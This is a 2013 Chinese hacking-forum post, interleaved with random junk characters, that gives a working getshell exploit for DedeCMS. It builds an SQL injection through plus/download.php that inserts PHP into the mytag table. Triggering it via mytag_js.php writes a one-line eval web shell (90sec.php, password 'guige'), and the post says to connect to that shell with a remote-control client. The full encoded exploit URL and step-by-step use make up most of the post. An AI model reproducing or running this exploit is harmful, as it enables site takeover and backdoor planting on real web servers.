本帖最后由 土豆 于 2013-6-10 14:41 编辑
! M- v& A& O4 y* P! A* R
( w) n6 _+ G! f
4 U5 G3 t6 m8 `2 i5 d# ^. ^8 l: n作者:鬼哥
' j. N# C1 Q' B' K; {0 Z. N/ H
% |% N% K: P; z' H看贴不回,没JJ
: u1 J# w8 g3 [0 p$ e; X+ J' ?5 b: N: \! b$ s
漏洞大家都知道是哪个。0 c. _( W v9 a! H
1 l: f, Z: U; P) Y# o其实我一直在玩。。郁闷 虽然这个漏洞不是我第一个发现的,以前也是朋友告诉我。
z1 M; n" H/ Q2 y! D8 Q% B. |1 p9 N: R# x; H& O
但是没公开。我承认想自己留着玩。。以前这个漏洞应该很多人知道没发出来而已。: f$ y% y2 I/ S7 Q
0 [! ]% C+ Y0 U/ C* a: ~刚看了出的几个exp .. 进后台。还得找后台路径 太麻烦了吧?. ]0 d5 s/ G- c3 f0 X! ~: d, z
$ I$ [ t* [& j7 A; V' K5 N
getshell 很容易 。 既然刚发出来的是 sql方法getshell 我也看到几个人发了sql增加表mytag的内容。( J+ n- b$ ~) j. V: ?3 p' V
# K8 E: w- Z1 A$ O H2 _. c
但是测试了下。。失败 s% h* L6 s; P/ E, h5 N
6 o0 y8 Q) Q/ O3 d( T' B5 A原因: 用的语句是update 很多站 mytag 里面都没内容。那么你用update 那有什么用 修改不了任何数据。只能用 INSERT 当然,语句带#就会暴 错误。。现在要做的饶过即可。以前也出过那么多dede sql 结合饶过,成功INSERT。
. e6 T7 u+ f' ?: `) A4 e8 @ U X" j5 K, [2 ]5 ?
构造语句:mytag` (aid,expbody,normbody) VALUES(9013,@`\'`,'{dede:php}file_put_contents(''90sec.php'',''<?php eval($_POST[guige]);?>'');{/dede:php}') # @`\'`& M r! y h2 Q6 s7 P
a$ ? m. ~* v- S
EXP:9 p' y5 A Q9 v3 n9 F$ _
' {4 z$ I0 d# v/ |2 ^
http://www.xxx.com/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=101&arrs2[]=120&arrs2[]=112&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=44&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=57&arrs2[]=48&arrs2[]=49&arrs2[]=51&arrs2[]=44&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96&arrs2[]=44&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=57&arrs2[]=48&arrs2[]=115&arrs2[]=101&arrs2[]=99&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=103&arrs2[]=117&arrs2[]=105&arrs2[]=103&arrs2[]=101&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=41&arrs2[]=32&arrs2[]=35&arrs2[]=32&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96% d u G7 ?8 g- N }/ |6 t6 g
3 j9 ^9 j s9 v/ `9 ^
" B# j4 p7 D: t7 V- o5 l成功增加。, f8 {5 w" ]9 M) N8 J# b( S
: V- }7 p$ M7 r- i1 a访问http://www.xxx.com/plus/mytag_js.php?aid=9013
8 O# X) _8 U% e生成一句话木马.
3 c. g, o N: U菜刀连接 http://www.xxx.com/plus/90sec.php 密码 guige
" @& V6 a, a( d7 e! o3 }+ r; U, S7 K
测试OK。 : i( K1 X2 x% w3 f1 ~2 [. j
g: _' x3 a! j& Y) F$ e 6 _" R ~2 v# v3 D' {
|
发表于 2013-6-10 16:49:18
收藏
支持
反对